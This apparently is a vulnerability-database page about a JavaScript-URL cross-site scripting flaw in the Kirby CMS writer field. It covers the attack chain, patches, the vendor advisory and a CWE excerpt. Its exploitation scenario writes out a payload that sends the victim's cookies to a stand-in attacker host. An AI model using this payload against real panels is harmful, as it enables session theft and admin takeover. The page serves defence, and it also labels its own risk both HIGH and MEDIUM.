CVE-2026-49276: Panel XSS — HIGH

CISO Take

Kirby CMS's writer field fails to block JavaScript URL injection in its link and email marks, allowing an authenticated Panel user to execute arbitrary JavaScript in their own browser session by clicking a crafted link before content is saved. With 479 downstream dependents and no EPSS, KEV listing, or public exploits available, the default attack surface is limited to self-XSS requiring authenticated access, content structure knowledge, and social engineering — but Panel plugins using the raw `<k-writer>` component without output sanitization may be exposed to stored XSS, enabling privilege escalation to admin sessions. If Kirby is part of your AI content pipeline (RAG source management, training data curation), a compromised admin session becomes an upstream injection risk into AI-ingested data. Upgrade to Kirby 4.9.4 or 5.4.4 immediately and audit all custom Panel plugins for unsanitized `<k-writer>` output.

Sources: GitHub Advisory NVD OpenSSF ATLAS

What is the risk?

Risk is MEDIUM. The default configuration constrains this to self-XSS, requiring an authenticated attacker who socially engineers themselves into having a victim click a malicious link before content is saved and backend-sanitized. The elevated risk vector is Panel plugins that render `<k-writer>` output without sanitization, which enables stored XSS and potential privilege escalation from contributor to admin. No public exploit exists and CISA has not listed this in KEV. The OpenSSF Scorecard of 6.6/10 reflects moderate supply chain hygiene, and 35 prior CVEs in the same package indicate a recurring pattern of input validation debt in this project.

How does the attack unfold?

Initial Access

Attacker obtains authenticated Panel access via valid contributor or editor credentials, leveraging the multi-user Panel access model.

AML.T0012

Malicious Link Crafting

Attacker embeds a 'javascript:' URL scheme link in the writer field using the custom URL type, bypassing client-side validation.

AML.T0011.003

Social Engineering

Attacker lures a higher-privileged Panel user to open and click the draft content before it is saved and backend-sanitized.

AML.T0052

Impact

JavaScript executes in the victim's Panel session, enabling session token exfiltration, privilege escalation, or silent admin API abuse.

AML.T0048.003

Initial Access

Attacker obtains authenticated Panel access via valid contributor or editor credentials, leveraging the multi-user Panel access model.

AML.T0012

Malicious Link Crafting

Attacker embeds a 'javascript:' URL scheme link in the writer field using the custom URL type, bypassing client-side validation.

AML.T0011.003

Social Engineering

Attacker lures a higher-privileged Panel user to open and click the draft content before it is saved and backend-sanitized.

AML.T0052

Impact

JavaScript executes in the victim's Panel session, enabling session token exfiltration, privilege escalation, or silent admin API abuse.

AML.T0048.003

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
Panel	composer	<= 4.9.3	`4.9.4`
5.7K OpenSSF 6.6 479 dependents Pushed 5d ago 60% patched ~5d to patch Full package profile →

Do you use Panel? You're affected.

How severe is it?

CVSS 3.1

N/A

EPSS

N/A

Exploitation Status

No known exploitation

Sophistication

Moderate

What should I do?

5 steps

Patch immediately: upgrade to Kirby 4.9.4 (v4 branch) or 5.4.4 (v5 branch) or any later release — both add robust URL scheme validation against dangerous inputs.
Audit all custom Panel plugins that instantiate <k-writer> — verify they sanitize HTML output (strip javascript: schemes) before persisting to content files.
Restrict writer field access in blueprints to minimally trusted roles.
If patching is not immediately possible, disable writer fields in blueprints or temporarily limit Panel access to admin-only.
Scan existing content files for 'javascript:' substrings in writer field data to detect prior exploitation.

How is it classified?

Social Engineering Code Execution Data Leakage Framework Plugin AML.T0011.003 - Malicious Link AML.T0048.003 - User Harm AML.T0049 - Exploit Public-Facing Application

Which compliance frameworks are affected?

This CVE is relevant to:

ISO 42001

A.6.2.6 - Security of AI system components

NIST AI RMF

GOVERN-6.2 - Policies and procedures for AI risk in third-party components

OWASP LLM Top 10

LLM02 - Insecure Output Handling

Frequently Asked Questions

What is CVE-2026-49276?

Kirby CMS's writer field fails to block JavaScript URL injection in its link and email marks, allowing an authenticated Panel user to execute arbitrary JavaScript in their own browser session by clicking a crafted link before content is saved. With 479 downstream dependents and no EPSS, KEV listing, or public exploits available, the default attack surface is limited to self-XSS requiring authenticated access, content structure knowledge, and social engineering — but Panel plugins using the raw `<k-writer>` component without output sanitization may be exposed to stored XSS, enabling privilege escalation to admin sessions. If Kirby is part of your AI content pipeline (RAG source management, training data curation), a compromised admin session becomes an upstream injection risk into AI-ingested data. Upgrade to Kirby 4.9.4 or 5.4.4 immediately and audit all custom Panel plugins for unsanitized `<k-writer>` output.

Is CVE-2026-49276 actively exploited?

No confirmed active exploitation of CVE-2026-49276 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-49276?

1. Patch immediately: upgrade to Kirby 4.9.4 (v4 branch) or 5.4.4 (v5 branch) or any later release — both add robust URL scheme validation against dangerous inputs. 2. Audit all custom Panel plugins that instantiate `<k-writer>` — verify they sanitize HTML output (strip javascript: schemes) before persisting to content files. 3. Restrict writer field access in blueprints to minimally trusted roles. 4. If patching is not immediately possible, disable writer fields in blueprints or temporarily limit Panel access to admin-only. 5. Scan existing content files for 'javascript:' substrings in writer field data to detect prior exploitation.

What systems are affected by CVE-2026-49276?

This vulnerability affects the following AI/ML architecture patterns: Headless CMS feeding RAG pipelines, AI training data curation interfaces, Content management for AI pipelines, Multi-user AI content authoring platforms.

What is the CVSS score for CVE-2026-49276?

No CVSS score has been assigned yet.

What is the AI security impact?

Affected AI Architectures

Headless CMS feeding RAG pipelinesAI training data curation interfacesContent management for AI pipelinesMulti-user AI content authoring platforms

MITRE ATLAS Techniques

AML.T0011.003 Malicious Link

AML.T0048.003 User Harm

AML.T0049 Exploit Public-Facing Application

Compliance Controls Affected

ISO 42001: A.6.2.6

NIST AI RMF: GOVERN-6.2

OWASP LLM Top 10: LLM02

What are the technical details?

Original Advisory

### TL;DR This vulnerability affects Kirby sites that use the writer field in any blueprint. It was possible to include a scripting link as the target of a link (or email link). This link target would then be clickable by the user who entered it. A successful attack commonly requires knowledge of the content structure by the attacker as well as social engineering of a user with access to the Panel. The attack *cannot* be automated. In Kirby's default configuration, the vulnerability is limited to self-XSS and *cannot* directly affect other users or visitors of the site. Panel plugins that are directly using the `<k-writer>` component may also be affected by stored XSS if they don't sanitize the resulting HTML before saving it to the content. **This vulnerability is of high severity for affected sites.** ---- ### Introduction Cross-site scripting (XSS) is a type of vulnerability that allows attackers to execute any kind of JavaScript code inside the Panel session of the same or other users. In the Panel, a harmful script can, for example, trigger requests to Kirby's API with the permissions of the victim. *Self* cross-site scripting (self-XSS) typically involves a user inadvertently executing malicious code within their own context, often through social engineering techniques. This can occur when a user is tricked into pasting and executing malicious JavaScript code into the browser's developer console, address bar or form fields. In a *stored* XSS attack, the malicious payload is saved into the content data and has the potential to affect other users or site visitors. Such vulnerabilities are critical if you might have potential attackers in your group of authenticated Panel users. They can escalate their privileges if they get access to the Panel session of an admin user. Depending on your site, other JavaScript-powered attacks are possible. ### Affected components The `writer` field allows users to input formatted text, including links to arbitrary URLs and email addresses. Its `link` and `email` marks are therefore a target for XSS attacks. As the vulnerability is in the writer mark components, it also affects all uses of the `<k-writer>` component in Panel plugins. ### Impact In affected releases, the `link` and `email` marks did not prevent XSS payloads from being submitted to the writer field's content data: - The `link` mark allowed users to enter JavaScript URLs using the "custom" URL type. These URLs would already be sanitized by the backend before storing the malicious link in the content file. However, the link may be clicked by the same user who entered it before the content is saved. - The `email` mark was also vulnerable to injected JavaScript URLs. However, it was not possible to perform the attack via the Panel user interface due to email validation. The attack needed to be performed via a side channel such as the browser console. The vulnerability allows attackers to inject malicious links into content. If the authenticated user clicked such a link before saving the content, the malicious script code would then be executed in their browser. ### Patches The problem has been patched in [Kirby 4.9.4](https://github.com/getkirby/kirby/releases/tag/4.9.4) and [Kirby 5.4.4](https://github.com/getkirby/kirby/releases/tag/5.4.4). Please update to one of these or a [later version](https://github.com/getkirby/kirby/releases) to fix the vulnerability. In all of the mentioned releases, we have added more robust validation against dangerous URL schemes that are entered in the affected writer marks.

Exploitation Scenario

An attacker with contributor-level Panel access crafts a page using the writer field, inserting a link whose target is set to 'javascript:fetch("https://attacker.com/exfil?t="+btoa(document.cookie))' via the custom URL type. They then social-engineer a Panel admin — via Slack, email, or a shared workflow — to open the draft and click what appears to be a legitimate reference link before saving. The JavaScript payload fires in the admin's Panel session, exfiltrating session tokens or silently submitting API requests with admin privileges (e.g., creating a rogue admin account). In a Panel plugin that renders `<k-writer>` output without sanitization, the malicious link persists in stored content and fires for every admin who subsequently views the page.

Weaknesses (CWE)

CWE-83 Improper Neutralization of Script in Attributes in a Web Page Primary

CWE-83 — Improper Neutralization of Script in Attributes in a Web Page: The product does not neutralize or incorrectly neutralizes "javascript:" or other URIs from dangerous attributes within tags, such as onmouseover, onload, onerror, or style.

[Implementation] Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including tag attributes, hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended.
[Implementation] Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component. The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle X

Source: MITRE CWE corpus.